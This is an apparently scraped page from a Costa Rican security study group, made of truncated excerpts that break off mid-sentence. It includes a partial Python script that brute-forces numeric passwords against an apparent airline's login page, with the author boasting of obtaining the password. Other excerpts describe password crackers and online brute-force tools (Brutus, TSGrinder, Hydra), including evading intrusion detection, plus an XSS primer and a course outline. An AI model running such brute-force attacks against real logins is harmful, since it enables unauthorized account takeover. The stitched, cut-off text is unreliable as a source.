Grupo Seguridad Informatica Costa Rica

Para acelerar el proceso de brute forcing utilicé el primer script en mi PC y el otro lo ejecuté en un servidor shell que tengo en el mundo exterior con Python instalado, por lo que en menos de 50 minutos la contraseña estaba en mis manos. import urllib import urllib2 import md5 import random import time abc = "0123456789"; url = "http://aerolinea.vuelefeliz.com/login" new_passwd = 0 for i1 in range(0, len(abc)): var0 = abc[i1] for i2 in range(0, len(abc)): var1 = abc[i2] for i3 in range(0, len(abc)): var2 = abc[i3] for i4 in range(0, len(abc)): var3 = abc[i4] passwd = var0 + var1 + var2 + var3 print "- Password: " + passwd try: values={'Aer_Id':'MTYyMA==', #esto es el u

Bruteforce Password Recovery Written by Tony Bhimani August 6, 2004 Requirements *nix based Operating System Perl 5.6.1 or higher & these modules • Getopt::Std • Crypt::PasswdMD5 Download the source code: bruteforce.tar.gz I have been using Perl for roughly six months, so it is still very new to me. In an attempt to sharpen my skills I sat down and thought about a nifty utility I could write. I decided upon a utility to recover lost passwords. Of course I could always change the password as root, but where's the fun in that? This script performs brute force attempts at recovering a md5 crypted password which you can find in /etc/shadow. I have only tested this on RedHat 7.3 and cannot confirm nor deny that it will work on other distributions. FreeBSD may do the encryption differently than Fedora and so on. So my advice is if you try and recover a password, run the bruteforce scri

Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms. Fireforce can use dictionaries or generate passwords based on several character types. Attacks can be performed on fields using two distinct password sources.. https://addons.mozilla.org/es-es/firefox/addon/fireforce/

There are dozens of offline passwords crackers for most password-protected resources. Those crackers are designed to find weak passwords and let the administrator know how safe his resources really are. Brutus is a different kind of password cracker. It works online, trying to break telnet, POP3, FTP, HTTP, RAS or IMAP by simply trying to login as a legitimate users. Brutus imitates a real outside attack (unlike other password cracking applications that simulate an internal attack) and thus serves as a valuable security-auditing tool. Brutus can run in single user mode (trying to break into a single user's account by trying different password combinations) or by trying a list of user/password combinations from a word file. The application scans the host for known services and can be easily customized to break-in any other custom service requiring interactive logon of a username and a password. Using Brutus will teach you a lot about your system, since it simulates a real a

TSGrinder is the first production Terminal Server brute force tool. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. And having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts. It is a "dictionary" based attack tool, but it does have some interesting features like "l337" conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection. Platform: Windows TSGrinder

This tool allows for rapid dictionary attacks against network login systems, including FTP, POP3, IMAP, Netbios, Telnet, HTTP Auth, LDAP NNTP, VNC, ICQ, Socks5, PCNFS, and more. It includes SSL support and is apparently now part of Nessus. THC-Hydra  

Grupo de seguridad Informatica ULATINA costa rica Asistentes: [email protected]  , [email protected] Current email address: [email protected] Este documento:         http://goo.gl/xfomb Grupo FB:                   http://goo.gl/elWL0 Fan page FB:          goo.gl/h6EB9 Grupo google:          h ttp://goo.gl/hNC5Z Carpeta google docs: http://goo.gl/IslSG Sugerencias :         goo.gl/5lB9v Objetivos : - Introducir a los participantes en los conceptos basicos sobre seguridad informatica.         +Hacking Ético         +Recabar Información         +Ingeniería Social         +Introducción a Fuerza Bruta         +Aplicaciónes Web y vulnerabilidades web (xss,rfi,etc)         +Inyección de código SQL         +Comandos Linux         +Servidores Windows         +Introducción a las Botnets         +Metodologías y Normativas (312) (Invitado especial un abogado )         +Metasploit y una revision al grupo( por Invitado especial de

Que es xss View more presentations from jamesjara .  GSI-CR XSS TECNICA XSS Cross-site scripting XSS, del inglés Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad típico de las aplicaciones Web, que permite a una tercera parte inyectar código JavaScript en páginas web vistas por el usuario, evitando medidas de control como la Política del mismo origen. DONDE SE ENCUENTRA ESTOS ERRORES? Estos errores se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web. No se limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. El problema está en que usualmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada). TIPOS DE XSS Directa (Persistente): este tipo de XSS comúnmen

Gente aqui publico la herramienta de brute force que desarolle para el grupo de hackers/seguridad informatica, osea es del grupo descarguenla los que quieran, ahi esta el tutorial.. vean el codigo ;) - demo: http://youtu.be/omrV1OIiWHc   - codigo fuente: (SVN) http://code.google.com/p/ brute-force-http/   - Los que no saben usar SVN(deberian) https:// brute-force-http.googlecode.com /svn/trunk/   https://www.facebook.com/ pages/ Division-de-Seguridad-Informati ca-Costa-Rica/184186294999144 https://www.facebook.com/groups/ComputerSocietyCR/ Brute forcing consists of systematically enumerating all possible candidates for the solution and checking whether each candidate satisfies the problem's statement. In web applications, we usually find a combination of user ID and password. Therefore, it's possible to carry out an attack to retrieve a valid user account and password, by trying to enumerate many (i.e., dictionary attack) or all the p